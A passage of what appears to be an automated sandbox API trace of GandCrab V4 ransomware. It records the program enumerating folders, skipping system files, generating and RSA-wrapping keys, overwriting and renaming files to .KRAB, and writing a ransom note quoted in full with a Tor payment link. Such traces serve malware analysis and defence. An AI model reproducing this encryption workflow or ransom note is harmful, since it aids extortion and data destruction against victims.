(lpString=".lock") returned 5 [0086.462] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.463] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0086.463] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.463] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.463] FindNextFileW (in: hFindFile=0x10231f8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0086.464] lstrcmpW (lpString1="f_lSY6wutXzpYdb6P1a.mp3", lpString2=".") returned 1 [0086.464] lstrcmpW (lpString1="f_lSY6wutXzpYdb6P1a.mp3", lpString2="..") returned 1 [0086.464] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\", lpString2="f_lSY6wutXzpYdb6P1a.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\f_lSY6wutXzpYdb6P1a.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\f_lSY6wutXzpYdb6P1a.mp3" [0086.464] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.464] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\f_lSY6wutXzpYdb6P1a.mp3.KRAB") returned 74 [0086.464] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\f_lSY6wutXzpYdb6P1a.mp3") returned 69 [0086.464] lstrlenW (lpString=".mp3") returned 4 [0086.464] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.465] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0086.465] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.465] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\f_lSY6wutXzpYdb6P1a.mp3") returned 69 [0086.465] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\f_lSY6wutXzpYdb6P1a.mp3") returned 69 [0086.465] lstrcmpiW (lpString1="f_lSY6wutXzpYdb6P1a.mp3", lpString2="desktop.ini") returned 1 [0086.465] lstrcmpiW (lpString1="f_lSY6wutXzpYdb6P1a.mp3", lpString2="autorun.inf") returned 1 [0086.465] lstrcmpiW (lpString1="f_lSY6wutXzpYdb6P1a.mp3", lpString2="ntuser.dat") returned -1 [0086.465] lstrcmpiW (lpString1="f_lSY6wutXzpYdb6P1a.mp3", lpString2="iconcache.db") returned -1 [0086.465] lstrcmpiW (lpString1="f_lSY6wutXzpYdb6P1a.mp3", lpString2="bootsect.bak") returned 1 [0086.465] lstrcmpiW (lpString1="f_lSY6wutXzpYdb6P1a.mp3", lpString2="boot.ini") returned 1 [0086.465] lstrcmpiW (lpString1="f_lSY6wutXzpYdb6P1a.mp3", lpString2="ntuser.dat.log") returned -1 [0086.465] lstrcmpiW (lpString1="f_lSY6wutXzpYdb6P1a.mp3", lpString2="thumbs.db") returned -1 [0086.465] lstrcmpiW (lpString1="f_lSY6wutXzpYdb6P1a.mp3", lpString2="KRAB-DECRYPT.html") returned -1 [0086.466] lstrcmpiW (lpString1="f_lSY6wutXzpYdb6P1a.mp3", lpString2="KRAB-DECRYPT.txt") returned -1 [0086.466] lstrcmpiW (lpString1="f_lSY6wutXzpYdb6P1a.mp3", lpString2="CRAB-DECRYPT.txt") returned 1 [0086.466] lstrcmpiW (lpString1="f_lSY6wutXzpYdb6P1a.mp3", lpString2="ntldr") returned -1 [0086.466] lstrcmpiW (lpString1="f_lSY6wutXzpYdb6P1a.mp3", lpString2="NTDETECT.COM") returned -1 [0086.466] lstrcmpiW (lpString1="f_lSY6wutXzpYdb6P1a.mp3", lpString2="Bootfont.bin") returned 1 [0086.466] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.466] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1010bd8) returned 1 [0086.469] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.470] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.470] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.470] CryptGenRandom (in: hProv=0x1010bd8, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0086.470] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0086.470] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.471] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x10113d0) returned 1 [0086.472] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.473] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.473] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.473] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0086.473] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0086.473] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.474] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010ce8) returned 1 [0086.475] CryptImportKey (in: hProv=0x1010ce8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0x10234f8) returned 1 [0086.475] CryptGetKeyParam (in: hKey=0x10234f8, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0086.475] CryptEncrypt (in: hKey=0x10234f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0086.476] GetLastError () returned 0x0 [0086.476] CryptDestroyKey (hKey=0x10234f8) returned 1 [0086.476] CryptReleaseContext (hProv=0x1010ce8, dwFlags=0x0) returned 1 [0086.476] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1011238) returned 1 [0086.477] CryptImportKey (in: hProv=0x1011238, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0x1022ff8) returned 1 [0086.478] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0086.478] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0086.478] GetLastError () returned 0x0 [0086.478] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0086.478] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0086.478] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\f_lSY6wutXzpYdb6P1a.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\f_lsy6wutxzpydb6p1a.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x474 [0086.479] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0086.479] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0086.479] ReadFile (in: hFile=0x474, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0x1787, lpOverlapped=0x0) returned 1 [0086.545] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffffe879, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.545] WriteFile (in: hFile=0x474, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x1787, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0x1787, lpOverlapped=0x0) returned 1 [0086.545] WriteFile (in: hFile=0x474, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0086.545] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.549] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.550] CloseHandle (hObject=0x474) returned 1 [0086.550] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.550] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\f_lSY6wutXzpYdb6P1a.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\f_lsy6wutxzpydb6p1a.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\f_lSY6wutXzpYdb6P1a.mp3.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\f_lsy6wutxzpydb6p1a.mp3.krab")) returned 1 [0086.551] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.552] FindNextFileW (in: hFindFile=0x10231f8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0086.552] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0086.552] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0086.552] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\KRAB-DECRYPT.txt" [0086.552] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.552] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\KRAB-DECRYPT.txt.KRAB") returned 67 [0086.552] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\KRAB-DECRYPT.txt") returned 62 [0086.552] lstrlenW (lpString=".txt") returned 4 [0086.552] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.553] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0086.553] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.553] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\KRAB-DECRYPT.txt") returned 62 [0086.553] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\KRAB-DECRYPT.txt") returned 62 [0086.553] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0086.553] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0086.553] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0086.553] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0086.553] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0086.553] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0086.553] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0086.553] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0086.553] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0086.554] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0086.554] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.554] FindNextFileW (in: hFindFile=0x10231f8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0086.554] lstrcmpW (lpString1="NH5WzAN7jgsR5HA", lpString2=".") returned 1 [0086.554] lstrcmpW (lpString1="NH5WzAN7jgsR5HA", lpString2="..") returned 1 [0086.554] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\", lpString2="NH5WzAN7jgsR5HA" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA" [0086.554] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\" [0086.554] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0086.554] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0086.555] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0086.555] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0086.555] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0086.555] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.555] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.555] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\\\KRAB-DECRYPT.txt") returned 79 [0086.555] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\nh5wzan7jgsr5ha\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x474 [0086.557] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0086.557] WriteFile (in: hFile=0x474, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0086.557] CloseHandle (hObject=0x474) returned 1 [0086.557] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.558] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.558] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x21, wMilliseconds=0x2f1)) [0086.558] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.559] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0086.559] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0086.559] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\d2ca4a08d2ca4dee3d.lock") returned 85 [0086.559] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\lf9t\\1wzmwi44bo\\nh5wzan7jgsr5ha\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x474 [0086.560] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.560] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.561] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\") returned 62 [0086.561] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\*" [0086.561] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0x1023278 [0086.561] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.561] FindNextFileW (in: hFindFile=0x1023278, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0086.561] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.561] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.561] FindNextFileW (in: hFindFile=0x1023278, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0086.561] lstrcmpW (lpString1="0BKEAkHbyG3.flv", lpString2=".") returned 1 [0086.561] lstrcmpW (lpString1="0BKEAkHbyG3.flv", lpString2="..") returned 1 [0086.561] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\", lpString2="0BKEAkHbyG3.flv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\0BKEAkHbyG3.flv") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\0BKEAkHbyG3.flv" [0086.561] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.563] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\0BKEAkHbyG3.flv.KRAB") returned 82 [0086.563] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Lf9t\\1wZMWI44bo\\NH5WzAN7jgsR5HA\\0BKEAkHbyG3.flv") returned 77 [0086.563] lstrlenW (lpString=".flv") returned 4 [0086.563] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.564] 